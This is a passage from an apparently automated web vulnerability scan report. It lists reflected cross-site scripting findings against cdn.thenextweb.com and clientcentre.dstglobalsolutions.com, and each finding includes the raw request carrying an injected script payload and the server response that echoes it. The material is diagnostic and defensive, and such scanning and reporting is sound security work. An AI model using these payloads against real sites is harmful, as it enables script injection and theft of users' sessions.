HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:02 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=p4vqoer71tp2c071c24dm9p845; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:32 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content2a656</script><script>alert(1)</script>934b12ee9b9/themes/tnw_6/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.78. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfc65</script><script>alert(1)</script>4f0124b7488 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesdfc65</script><script>alert(1)</script>4f0124b7488/tnw_6/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:11 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=v6t7k8dsv36u68gvf7pqb33s33; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:41 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themesdfc65</script><script>alert(1)</script>4f0124b7488/tnw_6/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.79. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9164</script><script>alert(1)</script>1115affc524 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6f9164</script><script>alert(1)</script>1115affc524/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:20 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=knn7v5902md8fq4urb2p03d505; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:49 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6f9164</script><script>alert(1)</script>1115affc524/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.80. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca7f8</script><script>alert(1)</script>fda5be8e479 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/staticca7f8</script><script>alert(1)</script>fda5be8e479/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:27 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=sa0c0ap13fp0fi05eneq6su1m6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:56 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/staticca7f8</script><script>alert(1)</script>fda5be8e479/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.81. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6556</script><script>alert(1)</script>666a0cab711 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/imagesc6556</script><script>alert(1)</script>666a0cab711/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:34 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=thnu87hc23vjhaaj3aqlnb9ko7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:56:04 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/imagesc6556</script><script>alert(1)</script>666a0cab711/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.82. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a456</script><script>alert(1)</script>c82b48ce1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/images/sprite.png1a456</script><script>alert(1)</script>c82b48ce1?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:56:19 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=e3qmo3o5f4tvedvgs2s7a7loe3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:56:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26110
Date: Wed, 05 Oct 2011 20:56:20 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
NFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/images/sprite.png1a456</script><script>alert(1)</script>c82b48ce1?version=5'
    };
</script>
...[SNIP]...

3.83. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78e52</script><script>alert(1)</script>67217806899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content78e52</script><script>alert(1)</script>67217806899/themes/tnw_6/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:07 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=73sbm98jtb4s0vgblhqo1679n6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:55:33 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content78e52</script><script>alert(1)</script>67217806899/themes/tnw_6/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.84. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76aa</script><script>alert(1)</script>8a6504a518d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themese76aa</script><script>alert(1)</script>8a6504a518d/tnw_6/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:25 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=io46pi954pgkbqkan90hu8q3a5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:55:54 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themese76aa</script><script>alert(1)</script>8a6504a518d/tnw_6/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.85. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6d3</script><script>alert(1)</script>577051df666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_62d6d3</script><script>alert(1)</script>577051df666/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:49 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=67sbs1oah3b2mtf624u89il9c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:56:15 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_62d6d3</script><script>alert(1)</script>577051df666/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.86. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2a63</script><script>alert(1)</script>9807f8e6f38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/style.cssa2a63</script><script>alert(1)</script>9807f8e6f38?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:56:37 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=bflbl927msg5hsh0fk4708emj7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:56:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:56:38 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
>
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/style.cssa2a63</script><script>alert(1)</script>9807f8e6f38?ver=8.21'
    };
</script>
...[SNIP]...

3.87. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ca7'-alert(1)-'6f3146d22d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?75ca7'-alert(1)-'6f3146d22d1=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:45:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19202
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/?75ca7'-alert(1)-'6f3146d22d1=1'
           HTTP_Referer = 'http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist'
           RedirectTo = ''

   </script>
...[SNIP]...

3.88. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa2"><script>alert(1)</script>f11387889d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1dfa2"><script>alert(1)</script>f11387889d2=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
